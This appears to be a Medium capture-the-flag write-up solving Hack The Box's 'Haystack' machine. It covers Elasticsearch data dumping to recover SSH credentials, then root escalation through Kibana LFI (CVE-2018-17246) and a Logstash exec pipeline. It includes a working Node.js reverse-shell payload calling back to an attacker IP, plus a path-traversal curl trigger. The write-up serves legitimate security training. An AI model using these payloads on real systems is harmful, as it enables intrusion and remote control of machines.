HacktheBox — Haystack

sif0
sif0
Nov 2 · 12 min read
hackthebox.eu

This is a write-up on how I solved Haystack from HacktheBox.

Hack the Box is an online platform where you practice your penetration testing skills.

As always, I try to explain how I understood the concepts here from the machine because I want to really understand how things work. So please, if I misunderstood a concept, please let me know.

About the box:

This box got a lot of hate because of its initial step. It starts with a base64 string inside a picture, where you’ll look for it in a “haystack” of data. After that, you’ll get credentials to SSH in the box. Then you have to exploit an LFI vulnerability in Kibana, then create a file that will be ingested by Logstash, leading to code execution as root.

Recon:

I first run an initial nmap scan by invoking the command, saving it to my nmap directory

nmap -sV -sC -oA nmap/initial 10.10.10.115

The results are:

Nmap scan report for 10.10.10.115
Host is up (0.72s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 2a:8d:e2:92:8b:14:b6:3f:e4:2f:3a:47:43:23:8b:2b (RSA)
| 256 e7:5a:3a:97:8e:8e:72:87:69:a3:0d:d1:00:bc:1f:09 (ECDSA)
|_ 256 01:d2:59:b2:66:0a:97:49:20:5f:1c:84:eb:81:ed:95 (ED25519)
80/tcp open http nginx 1.12.2
|_http-server-header: nginx/1.12.2
|_http-title: Site doesn't have a title (text/html).
9200/tcp open http nginx 1.12.2
| http-methods:
|_ Potentially risky methods: DELETE
|_http-server-header: nginx/1.12.2
|_http-title: Site doesn't have a title (application/json; charset=UTF-8).

Note that port 22(ssh), port 80(http using nginx) and port 9200 are open based on my initial scan. The versions of the nginx running on port 80 and port 9200 are the same.

Port 80

Checking port 80, all I get is this:

It is an image of a needle in a haystack. I then check the page source:

So the page only has the image. I download it and inspect it using the exiftool:

I also run strings on the file and found a base64 encoded string at the end:

I decode it by invoking:

echo -n bGEgYWd1amEgZW4gZWwgcGFqYXIgZXMgImNsYXZlIg==|base64 -d

The output is:

la aguja en el pajar es "clave"

Since it looks like its Spanish, I quickly throw it over to Google translate:

Note that the key is placed between quotes, and its Spanish equivalent is “clave”.

Port 9200

Checking port 9200:

Its Elasticsearch. Reading through its documentation, it is found that the by default it listens on port 9200(for REST). It can also listen on port 9300 for node communications. According to documentation:

The Elasticsearch REST APIs are exposed using JSON over HTTP.

Listing indices:

I first start to list the indices:

curl http://10.10.10.115:9200/_cat/indices?v

This returns high-level information about indices in a cluster.

There are 3 indices: .kibana(default), quotes, and bank.

I can then run a search on an index with the format:

curl -X POST http://10.10.10.115:9200/<index>/_search

I then check it on the bank index:

curl -X POST http://10.10.10.115:9200/bank/_search

This returns tons of JSON data:

"took":2,"timed_out":false,"_shards":{"total":5,"successful":5,"skipped":0,"failed":0},"hits":{"total":1000,"max_score":1.0,"hits":[{"_index":"bank","_type":"account","_id":"25","_score":1.0,"_source":{"account_number":25,"balance":40540,"firstname":"Virginia","lastname":"Ayala","age":39,"gender":"F","address":"171 Putnam Avenue","employer":"Filodyne","email":"virginiaayala@filodyne.com","city":"Nicholson","state":"PA"}},{"_index":"bank","_type":"account","_id":"44","_score":1.0,"_source":{"account_number":44,"balance":34487,"firstname":"Aurelia","lastname":"Harding","age":37,"gender":"M","address":"502 Baycliff Terrace","employer":"Orbalix","email":"aureliaharding@orbalix.com","city":"Yardville","state":"DE"}},{"_index":"bank","_type":"account","_id":"99","_score":1.0,"_source":{"account_number":99,"balance":47159,"firstname":"Ratliff","lastname":"Heath","age":39,"gender":"F","address":"806 Rockwell Place","employer":"Zappix","email":"ratliffheath@zappix.com","city":"Shaft","state":"ND"}},{"_index":"bank","_type":"account","_id":"119","_score":1.0,"_source":{"account_number":119,"balance":49222,"firstname":"Laverne","lastname":"Johnson","age":28,"gender":"F","address":"302 Howard Place","employer":"Senmei","email":"lavernejohnson@senmei.com","city":"Herlong","state":"DC"}},{"_index":"bank","_type":"account","_id":"126","_score":1.0,"_source":{"account_number":126,"balance":3607,"firstname":"Effie","lastname":"Gates","age":39,"gender":"F","address":"620 National Drive","employer":"Digitalus","email":"effiegates@digitalus.com","city":"Blodgett","state":"MD"}},{"_index":"bank","_type":"account","_id":"145","_score":1.0,"_source":{"account_number":145,"balance":47406,"firstname":"Rowena","lastname":"Wilkinson","age":32,"gender":"M","address":"891 Elton Street","employer":"Asimiline","email":"rowenawilkinson@asimiline.com","city":"Ripley","state":"NH"}},{"_index":"bank","_type":"account","_id":"183","_score":1.0,"_source":{"account_number":183,"balance":14223,"firstname":"Hudson","lastname":"English","age":26,"gender":"F","address":"823 Herkimer Place","employer":"Xinware","email":"hudsonenglish@xinware.com","city":"Robbins","state":"ND"}},{"_index":"bank","_type":"account","_id":"190","_score":1.0,"_source":{"account_number":190,"balance":3150,"firstname":"Blake","lastname":"Davidson","age":30,"gender":"F","address":"636 Diamond Street","employer":"Quantasis","email":"blakedavidson@quantasis.com","city":"Crumpler","state":"KY"}},{"_index":"bank","_type":"account","_id":"208","_score":1.0,"_source":{"account_number":208,"balance":40760,"firstname":"Garcia","lastname":"Hess","age":26,"gender":"F","address":"810 Nostrand Avenue","employer":"Quiltigen","email":"garciahess@quiltigen.com","city":"Brooktrails","state":"GA"}},{"_index":"bank","_type":"account","_id":"222","_score":1.0,"_source":{"account_number":222,"balance":14764,"firstname":"Rachelle","lastname":"Rice","age":36,"gender":"M","address":"333 Narrows Avenue","employer":"Enaut","email":"rachellerice@enaut.com","city":"Wright","state":"AZ"}}]}}

I can then pipe it to jq and filter the first 30 results:

curl -X POST http://10.10.10.115:9200/bank/_search | jq . | head -n 30

The output is:

Since its JSON, its a name value pair. I can then filter using a jq query. I’ll try to list all values with the name of balance. To do it:

curl -X POST http://10.10.10.115:9200/bank/_search | jq -r '.hits | .hits | .[] | ._source | .balance'

The command above will _search for the index bank, pipe it to a query from jq that looks for values inside the name hits, then search for the value inside hits again(whose value is an array .[]), and look for the the value in the name _source. I did this to practice jq 😂

I get this output:

40540
34487
47159
49222
3607
47406
14223
3150
40760
14764

Since there is nothing interesting in the index bank, I move on to quotes.

Quotes

Checking for the first 20 lines:

curl -X POST http://10.10.10.115:9200/quotes/_search | jq . | head -n 20

The output is:

{
"took": 1,
"timed_out": false,
"_shards": {
"total": 5,
"successful": 5,
"skipped": 0,
"failed": 0
},
"hits": {
"total": 253,
"max_score": 1,
"hits": [
{
"_index": "quotes",
"_type": "quote",
"_id": "14",
"_score": 1,
"_source": {
"quote": "En América se desarrollaron importantes civilizaciones, como Caral

Since the structure is hits → hits → _source → quote, I can invoke the command below to get the quote field, get the first 20 lines, and pipe it again to jq(since if you pipe the output of jq to a bash command, it loses its format):

curl -X POST http://10.10.10.115:9200/quotes/_search | jq -r '.hits | .hits |.[] | ._source ' | head -n 20 | jq .

The output is:

{
"quote": "En América se desarrollaron importantes civilizaciones, como Caral (la civilización más antigua de América, la cual se desarrolló en la zona central de Perú), los anasazi, los indios pueblo, quimbaya, nazca, chimú, chavín, paracas, moche, huari, lima, zapoteca, mixteca, totonaca, tolteca, olmeca y chibcha, y las avanzadas civilizaciones correspondientes a los imperios de Teotihuacan, Tiahuanaco, maya, azteca e inca, entre muchos otros."
}
{
"quote": "Imperios español y portugués en 1790."
}
{
"quote": "También se instalaron en América del Sur repúblicas de pueblos de origen africano que lograron huir de la esclavitud a la que habían sido reducidos por los portugueses, como el Quilombo de los Palmares o el Quilombo de Macaco."
}
{
"quote": "En 1804, los esclavos de origen africano de Haití se sublevaron contra los colonos franceses, declarando la independencia de este país y creando el primer estado moderno con gobernantes afroamericanos."
}
{
"quote": "A partir de 1809,23​ los pueblos bajo dominio de España llevaron adelante una Guerra de Independencia Hispanoamericana, de alcance continental, que llevó, luego de complejos procesos, al surgimiento de varias naciones: Argentina, Bolivia, Colombia, Costa Rica, Panamá, Chile, Ecuador, El Salvador, Guatemala, Honduras, México, Nicaragua, Paraguay, Perú, Uruguay y Venezuela. En 1844 y 1898 el proceso se completaría con la independencia de República Dominicana y Cuba, respectivamente."
}
{
"quote": "En 1816, se conformó un enorme estado independiente sudamericano, denominado Gran Colombia, y que abarcó los territorios de los actuales Panamá, Colombia, Venezuela y Ecuador y zonas de Brasil, Costa Rica, Guyana, Honduras, Nicaragua y Perú. La República se disolvió en 1830."
}

I get a bunch of quotes. If I translate one of the shorter quotes:

Nothing useful. They are just a bunch of sentences. I then tried to grep for “clave” (just pure guess) from the output since its Spanish, but I get nothing.

Since I may not be getting all the data and barely just scratching the surface, I then looked for a tool where I can dump all data from an index and then filter from there. I came across elasticsearch-dump.

I can then dump data from each index. Since there is a hint of Spanish language from the decoded base64, I’ll dump the quotes index first, since its contents has Spanish language also.

Mapping the data:

elasticsearch-dump/bin/elasticdump --input=http://10.10.10.115:9200/quotes --output=writeup/quote.mapping.json --type=mapping

Dumping the data:

elasticsearch-dump/bin/elasticdump --input=http://10.10.10.115:9200/quotes --output=writeup/quote.data.json --type=data

From what I did earlier, I can then check for the top 20 lines when searching for the quote value:

cat quote.data.json | jq -r '._source' | head -n 20 | jq .

The output is:

{
"quote": "En América se desarrollaron importantes civilizaciones, como Caral (la civilización más antigua de América, la cual se desarrolló en la zona central de Perú), los anasazi, los indios pueblo, quimbaya, nazca, chimú, chavín, paracas, moche, huari, lima, zapoteca, mixteca, totonaca, tolteca, olmeca y chibcha, y las avanzadas civilizaciones correspondientes a los imperios de Teotihuacan, Tiahuanaco, maya, azteca e inca, entre muchos otros."
}
{
"quote": "Imperios español y portugués en 1790."
}
{
"quote": "También se instalaron en América del Sur repúblicas de pueblos de origen africano que lograron huir de la esclavitud a la que habían sido reducidos por los portugueses, como el Quilombo de los Palmares o el Quilombo de Macaco."
}
{
"quote": "En 1804, los esclavos de origen africano de Haití se sublevaron contra los colonos franceses, declarando la independencia de este país y creando el primer estado moderno con gobernantes afroamericanos."
}

The output seems similar earlier, but when I use tail to check for the last quote values:

cat quote.data.json | jq -r '._source' | tail -n 20

The output is different from earlier:

{
"quote": "A pesar de ser considerada como una ciudad «relativamente segura», el nivel de temor en la población ha crecido de manera importante en el último tiempo. En 2007, un 22 % de su población manifestaba un «alto temor» de sufrir algún tipo de crimen en su contra, mientras en años anteriores las cifras eran considerablemente menores (en 2000 era de un 13,4 % y en 2005 de un 15,8 %). En comparación con otras ciudades del país, el promedio de este índice fuera de la capital es de un 15,9 % e incluso esta cifra es mayor que en las ciudades con mayor tasa de victimización: Iquique y Talca que poseen un 37,5 % y 35,9 % de victimización, sólo un 17,7 % y un 18,9 % de la población respectiva manifiesta un «alto temor». En el desglose por comunas, nuevamente las cifras más bajas están en el sector oriente, con Ñuñoa con un 10 %, y las más altas en El Bosque, con un 32,5 %.100​ Este alto grado de inseguridad que siente la población ha sido descrito como producto de las enormes brechas que diferencian a los habitantes de la ciudad y el rol de los medios de comunicación, entre otros.102"
}

Since this is a different data than what I was able to query earlier, I grep for the string “clave” again against the whole dump:

cat quote.data.json | grep clave

The output is:

{"_index":"quotes","_type":"quote","_id":"111","_score":1,"_source":{"quote":"Esta clave no se puede perder, la guardo aca: cGFzczogc3BhbmlzaC5pcy5rZXk="}}
{"_index":"quotes","_type":"quote","_id":"45","_score":1,"_source":{"quote":"Tengo que guardar la clave para la maquina: dXNlcjogc2VjdXJpdHkg "}}

They look like base64. Decoding them leads to:

echo -n cGFzczogc3BhbmlzaC5pcy5rZXk= | base64 -d
pass: spanish.is.key

Using the credentials to SSH, it works:

root@kali:~/Documents/htb/boxes/haystack# ssh security@10.10.10.115
security@10.10.10.115's password:

And can now read user.txt:

[security@haystack ~]$ cat user.txt
04d18bc79....

Getting Root:

The root part of this box is cool. It made me understand a technology which I’m not familiar with. I start my enumeration by checking /etc/passwd to check other potential users I can escalate to:

[security@haystack etc]$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkitd:x:999:998:User for polkitd:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
chrony:x:998:996::/var/lib/chrony:/sbin/nologin
security:x:1000:1000:security:/home/security:/bin/bash
elasticsearch:x:997:995:elasticsearch user:/nonexistent:/sbin/nologin
logstash:x:996:994:logstash:/usr/share/logstash:/sbin/nologin
nginx:x:995:993:Nginx web server:/var/lib/nginx:/sbin/nologin
kibana:x:994:992:kibana service user:/home/kibana:/sbin/nologin

Seeing that there is a kibana and logstash user, I run ps aux to check if those services are running:

kibana     6307  0.5  5.4 1351328 210872 ?      Ssl  Nov01   1:07 /usr/share/kibana/bin/../node/bin/node --no-warnings /usr/share/kibana/bin/../src/cli -c /etc/kibana/kibana.yml

It stands out that there is a Kibana service running. Kibana is a data visualization plugin for Elasticsearch.

Reading the documentation of Kibana, the config file by default is stored on /etc/kibana/kibana.yml. Reading its contents:

[security@haystack kibana]$ cat kibana.yml                                                                                                                                               
# Kibana is served by a back end server. This setting specifies the port to use.
server.port: 5601

# Specifies the address to which the Kibana server will bind. IP addresses and host names are both valid values.
# The default is 'localhost', which usually means remote machines will not be able to connect.
# To allow connections from remote users, set this parameter to a non-loopback address.
server.host: "127.0.0.1"

Running curl on localhost, port 5601 to see if its running:

[security@haystack kibana]$ curl 127.0.0.1:5601
<script>var hashRoute = '/app/kibana';
var defaultRoute = '/app/kibana';

Since Checking again port 9200, the version of Elasticsearch:

"version" : {
"number" : "6.4.2"

I then check for vulnerabilites for Elasticsearch version 6.4.2, a Kibana vulnerability stands out:

You can read about the vulnerability here:

The post explores a critical severity Local File Inclusion (LFI) vulnerability in Kibana, uncovered by CyberArk Labs. There is a post in Github that summarizes it: https://github.com/mpgn/CVE-2018-17246

CVE-2018–17246

I create a file with the contents:

(function(){
var net = require("net"),
cp = require("child_process"),
sh = cp.spawn("/bin/sh", []);
var client = new net.Socket();
client.connect(1339, "10.10.14.33", function(){
client.pipe(sh.stdin);
sh.stdout.pipe(client);
sh.stderr.pipe(client);
});
return /a/; // Prevents the Node.js application form crashing
})();

Triggering the LFI:

curl 127.0.0.1:5601/api/console/api_server?apis=../../../../../../../tmp/shell.js

I can get a shell as Kibana:

Checking for files owned by the group Kibana, removing files under proc:

find / -group kibana 2>/dev/null | grep -v proc

The logstash folder stands out:

Checking files under conf.d:

I see that the files are under the group kibana, but is owned by the user root. I then read the contents of the configuration files:

input.conf

filter.conf

output.conf

So basically the input.conf takes files under /opt/kibana/ whose names are logstash_*, checking it every 10 seconds, setting the type to execute.

The filter.conf then takes files that have type set to “execute”, and match the message inside the file with:

“Ejecutar\s*comando\s*:\s+%{GREEDYDATA:comando}"

You can read more about grok filtering here: https://www.elastic.co/guide/en/logstash/current/plugins-filters-grok.html

Then the output config file takes the file and executes a shell command. From the documentation itself: The command field of this event will be the command run. This means I can execute code.

So our file should be:

Ejecutar comando : <command here>

I then create a file called logstash_a which will connect to me:

And from my listener, I get the shell as root:

I can now read root.txt:

So that’s how I solved Haystack from Hack the Box.

I hoped you learned something from this. Thanks for reading my write-up! Cheers! 🍺


InfoSec Write-ups

A collection of write-ups from the best hackers in the world on topics ranging from bug bounties and CTFs to vulnhub machines, hardware challenges and real life encounters. In a nutshell, we are the largest InfoSec publication on Medium. Maintained by Hackrew

    sif0

    Written by

    sif0

    Infosec enthusiast.

    InfoSec Write-ups

    A collection of write-ups from the best hackers in the world on topics ranging from bug bounties and CTFs to vulnhub machines, hardware challenges and real life encounters. In a nutshell, we are the largest InfoSec publication on Medium. Maintained by Hackrew

    Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch
    Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore
    Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade